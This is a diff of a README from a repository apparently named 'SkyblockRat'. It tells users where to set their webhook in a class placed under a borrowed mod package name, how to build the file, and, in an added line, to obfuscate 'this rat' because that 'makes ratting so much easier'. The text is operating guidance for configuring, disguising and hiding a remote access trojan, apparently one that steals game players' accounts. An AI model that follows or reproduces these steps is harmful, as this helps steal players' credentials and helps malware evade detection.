ifallious/SkyblockRat/README.md

 ### you can change the webhook in:
 #### github.quantizr.autogg.guis
 ### then once you've changed the webhook you build the file! if you dont know how to build a java file then just google it
+### PLEASE obfuscate this rat there is so many online obfuscators and it makes ratting so much easier